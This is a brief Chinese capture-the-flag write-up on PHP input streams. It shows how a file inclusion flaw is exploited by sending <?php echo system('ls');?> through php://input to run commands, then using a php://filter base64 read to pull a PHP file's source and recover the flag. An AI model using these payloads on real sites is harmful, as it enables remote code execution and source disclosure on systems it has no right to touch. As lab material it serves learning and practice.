PHP输入流
php://input
php://input可以读取没有处理过的POST数据,也可以获取get的
php://input不能用于enctype=multipart/form-data”
首先看
题目给我们看的是phpinfo.php
提示说文件包含漏洞,php输入流使用,用Burp来首先抓包
然后再URL那一栏加上
?path=php://input
再在下方写入我们要传入的东西
<?php echo system('ls');?>
然后会爆出下面的目录
除了第一个目录基本都试过了,所以我们试试第一个目录,用php://filter
?path=php://filter/read=convert.base64-encode/resource=dle345aae.php
得到一个base64位编码:
解密后得到flag